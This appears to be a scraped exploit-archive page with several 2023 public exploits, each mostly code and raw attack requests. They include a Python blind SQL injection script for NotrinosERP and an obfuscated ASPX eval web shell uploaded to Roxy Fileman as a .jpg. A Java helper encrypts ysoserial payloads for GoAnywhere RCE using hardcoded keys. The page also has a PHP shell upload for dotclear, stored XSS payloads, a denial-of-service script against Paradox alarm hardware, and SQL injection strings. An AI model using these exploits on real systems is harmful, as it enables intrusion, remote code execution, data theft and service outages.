NotrinosERP version 0.7 suffers from a remote authentication blind SQL injection vulnerability.

    # Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7# Vendor Homepage: https://notrinos.com/# Version: 0.7# Tested on: Windows, Linux# CVE: CVE-2023-24788"""The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.The OrderNumber parameter require a valid orderNumber value.This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}                      r = requests.get(url, headers=headers)        res = r.text        if "NotrinosERP 0.7 - Login" in res:            session_cookies = login(target, username, password)            headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}            r = requests.get(url, headers=headers)        elif (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef login(target, username, password):    target = "%s/index.php" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')    def retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_name += chr(retrieved_value)                    else:            break    print("Database Name: "+db_name) def retrieveDBVersion(session_cookies):    db_version = ""    print("(+) Retrieving database version")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_version += chr(retrieved_value)            sys.stdout.flush()        else:            break    print("Database Version: "+db_version)def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)           print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)    print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

NotrinosERP 0.7 SQL Injection

Roxy Fileman versions 1.4.5 and below for .NET suffer from a remote shell upload vulnerability.

    # Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload# Date: 09/04/2023# Exploit Author: Zer0FauLT [admindeepsec@proton.me]# Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net# Version: <= 1.4.5# Tested on: Windows 10 and Windows Server 2019# CVE : 0DAY###########################################################################################                First, we upload the .jpg shell file to the server.                     ###########################################################################################POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 666Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="action"upload------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="method"ajax------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="d"/Upload/PenTest------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="files[]"; filename="test.jpg"Content-Type: image/jpegâ€°PNG<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>------WebKitFormBoundarygOxjsc2hpmwmISeJ--###########################################################################################   In the second stage, we manipulate the .jpg file that we uploaded to the server.     ###########################################################################################{"FILES_ROOT":          "","RETURN_URL_PREFIX":   "","SESSION_PATH_KEY":    "","THUMBS_VIEW_WIDTH":   "140","THUMBS_VIEW_HEIGHT":  "120","PREVIEW_THUMB_WIDTH": "300","PREVIEW_THUMB_HEIGHT":"200","MAX_IMAGE_WIDTH":     "1000","MAX_IMAGE_HEIGHT":    "1000","INTEGRATION":         "ckeditor","DIRLIST":             "asp_net/main.ashx?a=DIRLIST","CREATEDIR":           "asp_net/main.ashx?a=CREATEDIR","DELETEDIR":           "asp_net/main.ashx?a=DELETEDIR","MOVEDIR":             "asp_net/main.ashx?a=MOVEDIR","COPYDIR":             "asp_net/main.ashx?a=COPYDIR","RENAMEDIR":           "asp_net/main.ashx?a=RENAMEDIR","FILESLIST":           "asp_net/main.ashx?a=FILESLIST","UPLOAD":              "asp_net/main.ashx?a=UPLOAD","DOWNLOAD":            "asp_net/main.ashx?a=DOWNLOAD","DOWNLOADDIR":         "asp_net/main.ashx?a=DOWNLOADDIR","DELETEFILE":          "asp_net/main.ashx?a=DELETEFILE","MOVEFILE":            "asp_net/main.ashx?a=MOVEFILE","COPYFILE":            "asp_net/main.ashx?a=COPYFILE","RENAMEFILE":          "asp_net/main.ashx?a=RENAMEFILE","GENERATETHUMB":       "asp_net/main.ashx?a=GENERATETHUMB","DEFAULTVIEW":         "list","FORBIDDEN_UPLOADS":   "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess","ALLOWED_UPLOADS":     "bmp gif png jpg jpeg","FILEPERMISSIONS":     "0644","DIRPERMISSIONS":      "0755","LANG":                "auto","DATEFORMAT":          "dd/MM/yyyy HH:mm","OPEN_LAST_DIR":       "yes"}#############################################################################################################################################################################################################################   We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows.     #############################################################################################################################################################################################################################POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 44Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx===========================================================================================================================================================================================================================POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 68Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx###########################################################################################                                 and it's done!                                         ###########################################################################################HTTP/2 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By-Plesk: PleskWinDate: Sun, 09 Apr 2023 09:49:34 GMTContent-Length: 21{"res":"ok","msg":""}=============================================================================================

Roxy Fileman 1.4.5 Shell Upload

The Microsoft Windows kernel suffers from multiple issues with subkeys of transactionally renamed registry keys.

Windows Kernel Registry Key Issue

Goanywhere Encryption Helper version 7.1.1 suffers from a remote code execution vulnerability.

    // Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)// Google Dork:  title:"GoAnywhere" // Date: 3/26/2023// Exploit Author: Youssef Muhammad// Vendor Homepage: https://www.goanywhere.com/// Software Link:  https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0// Version:  > 7.1.1 for windows / > 7.0.3 for Linux // Tested on: Windows, Linux// CVE : CVE-2023-0669// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution import java.util.Base64;import javax.crypto.Cipher;import java.nio.charset.StandardCharsets;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.PBEKeySpec;import javax.crypto.spec.IvParameterSpec;import javax.crypto.spec.SecretKeySpec;import java.nio.file.Files;import java.nio.file.Paths;public class CVE_2023_0669_helper {    static String ALGORITHM = "AES/CBC/PKCS5Padding";    static byte[] KEY = new byte[30];    static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);    public static void main(String[] args) throws Exception {        if (args.length != 2) {            System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");            System.exit(1);        }        String filePath = args[0];        String version = args[1];        byte[] fileContent = Files.readAllBytes(Paths.get(filePath));        String encryptedContent = encrypt(fileContent, version);        System.out.println(encryptedContent);    }    public static String encrypt(byte[] data, String version) throws Exception {        Cipher cipher = Cipher.getInstance(ALGORITHM);        KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();        SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");        IvParameterSpec ivSpec = new IvParameterSpec(IV);        cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);        byte[] encryptedObject = cipher.doFinal(data);        String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);        String v = (version.equals("2")) ? "$2" : "";        bundle += v;        return bundle;    }    private static byte[] getInitializationValue() throws Exception {        // Version 1 Encryption        String param1 = "go@nywhereLicenseP@$$wrd";        byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();    }    private static byte[] getInitializationValueV2() throws Exception {        // Version 2 Encryption        String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";        byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();    }}

Goanywhere Encryption Helper 7.1.1 Remote Code Execution

WebsiteBaker version 2.13.3 suffers from a cross site scripting vulnerability.

    Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)Application: WebsiteBakerVersion: 2.13.3Bugs:  Stored XSSTechnology: PHPVendor URL: https://websitebaker.org/pages/en/home.phpSoftware Link: https://wiki.websitebaker.org/doku.php/en/downloadsDate of found: 02.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the page can do thispayload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3EPOST /admin/pages/add.php HTTP/1.1Host: localhostContent-Length: 137Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9Connection: closeb7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add2. Visit http://localhost/

WebsiteBaker 2.13.3 Cross Site Scripting

ESET Service version 16.0.26.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2023-04-05# Vendor : https://www.eset.com# Version : 16.0.26.0# Tested on OS: Microsoft Windows 11 pro x64#PoC :==============C:\>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

ESET Service 16.0.26.0 Unquoted Service Path

dotclear version 2.25.3 suffers from a remote shell upload vulnerability.

    Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)Application: dotclearVersion: 2.25.3Bugs:  Remote Code Execution (RCE) (Authenticated) via file uploadTechnology: PHPVendor URL: https://dotclear.org/Software Link: https://dotclear.org/downloadDate of found: 08.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================While writing a blog post, we know that we can upload images. But php did not allow file upload. This time<?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it.We were able to run the php code when we visited your pagepoc request:POST /dotclear/admin/post.php HTTP/1.1Host: localhostContent-Length: 566Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1ccConnection: closepost_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=poc video : https://youtu.be/oIPyLqLJS70

dotclear 2.25.3 Shell Upload

Paradox Security Systems version IPR512 suffers from a denial of service vulnerability.

#!/bin/bash

# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service  
# Google Dork: intitle:"ipr512 * - login screen"  
# Date: 09-APR-2023  
# Exploit Author: Giorgi Dograshvili  
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)  
# Version: IPR512  
# CVE : CVE-2023-24709

# Function to display banner message  
display_banner() {  
  echo "******************************************************"  
  echo "*                                                    *"  
  echo "*                PoC CVE-2023-24709                  *"  
  echo "*      BE AWARE!!! RUNNING THE SCRIPT WILL MAKE      *"  
  echo "*    A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!   *"  
  echo "*                                by SlashXzerozero   *"  
  echo "*                                                    *"  
  echo "******************************************************"  
}

# Call the function to display the banner  
display_banner  
  echo ""  
  echo ""  
  echo "Please enter a domain name or IP address with or without port"  
read -p  "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

# Step 2: Ask for user confirmation  
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm  
if [[ $confirm == "Y" || $confirm == "y" ]]; then  
  # Display loading animation  
  animation=("|" "/" "-" "\\")  
  index=0  
  while [[ $index -lt 10 ]]; do  
    echo -ne "Loading ${animation[index]} \r"  
    sleep 1  
    index=$((index + 1))  
  done

  # Use curl to send HTTP GET request with custom headers and timeout  
  response=$(curl -i -s -k -X GET \  
    -H "Host: $domain" \  
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \  
    -H "Accept: */" \  
    -H "Referer: http://$domain/login.html" \  
    -H "Accept-Encoding: gzip, deflate" \  
    -H "Accept-Language: en-US,en;q=0.9" \  
    -H "Connection: close" \  
    --max-time 10 \  
    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

  # Check response for HTTP status code 200 and print result  
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then  
    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"  
  else  
    echo -e "\nShouldn't be vulnerable! Please check the webpanel:  http://$domain/login.html"  
  fi  
else  
  echo "The script is stopped!."  
fi

Paradox Security Systems IPR512 Denial Of Service

Palo Alto Cortex XSOAR version 6.5.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)# Exploit Author: omurugur# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020# Version: 6.5.0 - 6.2.0 - 6.1.0# Tested on: [relevant os]# CVE : CVE-2022-0020# Author Web: https://www.justsecnow.com# Author Social: @omurugurrrA stored cross-site scripting (XSS) vulnerability in Palo Alto NetworkCortex XSOAR web interface enables an authenticated network-based attackerto store a persistent javascript payload that will perform arbitraryactions in the Cortex XSOAR web interface on behalf of authenticatedadministrators who encounter the payload during normal operations.POST /acc_UAB(MAY)/incidentfield HTTP/1.1Host: x.x.x.xCookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;isTimLicense=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)Gecko/20100101 Firefox/94.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://x.x.x.x/acc_UAB(MAY)Content-Type: application/jsonX-Xsrf-Token:Api_truncate_results: trueOrigin: https://x.x.x.xContent-Length: 373Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Fieldedited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}Regards,Omur UGUR

Palo Alto Cortex XSOAR 6.5.0 Cross Site Scripting

A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file /admin/inventory/manage_stock.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225406 is the identifier assigned to this vulnerability.

**Online Eyewear Shop v1.0 has SQL injection**

BUG\_Author:Gear-D

Website source address:https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html

Vulnerability File: /oews/admin/inventory/manage\_stock.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and (select 1 from(select count(\*),concat(0x61626364,(select (elt(999=999,1))),0x75767778,floor(rand(0)\*2))x from information\_schema.plugins group by x)a)-- a

    GET /oews/admin/inventory/manage_stock.php?id=1%27%20and%20(select%201%20from(select%20count(*),concat(0x61626364,(select%20(elt(999=999,1))),0x75767778,floor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a)--%20a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=k7m8rkajvoev3rcu6g7qup0660
    Connection: close
    

Injection success based on errors

Payload2:id=1' and (select 1 from (select(sleep(5)))a)-- a

    GET /oews/admin/inventory/manage_stock.php?id=1%27%20and%20(select%201%20from%20(select(sleep(5)))a)--%20a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=k7m8rkajvoev3rcu6g7qup0660
    Connection: close

Tag

#windows